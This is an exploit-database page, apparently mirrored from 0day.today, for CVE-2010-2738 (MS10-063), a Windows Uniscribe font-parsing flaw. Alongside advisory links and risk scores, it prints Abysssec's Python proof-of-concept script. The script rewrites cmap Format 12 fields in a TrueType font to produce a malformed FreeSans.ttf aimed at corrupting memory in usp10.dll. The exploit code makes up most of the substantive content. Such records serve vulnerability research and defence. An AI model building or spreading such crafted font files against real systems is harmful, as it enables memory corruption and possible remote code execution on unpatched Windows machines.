Microsoft Unicode Scripts Processor Remote Code Execution

🗓️ 01 Oct 2010 00:00:00Reported by AbysssecType

zdt🔗 0day.today👁 24 Views

Microsoft Unicode Scripts Processor Remote Code Executio

Reporter	Title	Published	Views	Family All 19
Circl	CVE-2010-2738	30 Sep 201000:00	–	circl
Check Point Advisories	Microsoft Windows Uniscribe Memory Corruption (CVE-2010-2738)	6 Dec 202000:00	–	checkpoint_advisories
Check Point Advisories	Uniscribe Font Parsing Engine Remote Code Excution (MS10-063; CVE-2010-2738)	5 Jul 201100:00	–	checkpoint_advisories
Check Point Advisories	Embedded Base-64 Encoded TTF Files (CVE-2010-2738)	14 Sep 201000:00	–	checkpoint_advisories
CVE	CVE-2010-2738	15 Sep 201018:00	–	cve
Cvelist	CVE-2010-2738	15 Sep 201018:00	–	cvelist
Exploit DB	Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)	30 Sep 201000:00	–	exploitdb
exploitpack	Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)	30 Sep 201000:00	–	exploitpack
Microsoft KB	MS10-063: Vulnerability in Unicode Scripts Processor could lead to remote code execution	6 Nov 201902:31	–	mskb
NVD	CVE-2010-2738	15 Sep 201019:00	–	nvd

=========================================================
Microsoft Unicode Scripts Processor Remote Code Execution
=========================================================

  Title             : Microsoft Unicode Scripts Processor Remote Code Execution
  Version           : usp10.dll XP , Vista
  Analysis          : http://www.abysssec.com
  Vendor            : http://www.microsoft.com
  Impact            : Critical
  Contact           : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           : @abysssec
  CVE               : CVE-2010-2738
  MOAUB Number      : MOAUB-FINAL
 
http://www.exploit-db.com/moaub-30-microsoft-unicode-scripts-processor-remote-code-execution-ms10-063/
http://www.exploit-db.com/sploits/moaub-30-PoC.zip
'''
 
import sys
import struct
def main():
    
    try:
                 
        fdR = open('src.ttf', 'rb+')
        strTotal = fdR.read()
        str1 = strTotal[:18316]
        nGroups = '\x00\x00\x00\xDC'          # nGroups field from Format 12 subtable  of cmap table
        startCharCode = '\x00\xE5\xF7\x20'    # startCharCode  field from a Group Structure
        endCharCode  = '\x00\xE5\xF7\xFE'     # endCharCode  field from a Group Structure
        str2 = strTotal[18328:]
         
        fdW= open('FreeSans.ttf', 'wb+')
        fdW.write(str1)
        fdW.write(nGroups)
        fdW.write(startCharCode)
        fdW.write(endCharCode)
        fdW.write(str2)
        fdW.close()
        fdR.close()
        print '[-] Font file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                 
if __name__ == '__main__':
    main()



#  0day.today [2018-04-09]  #

01 Oct 2010 00:00Current

7High risk

Vulners AI Score7

EPSS0.15844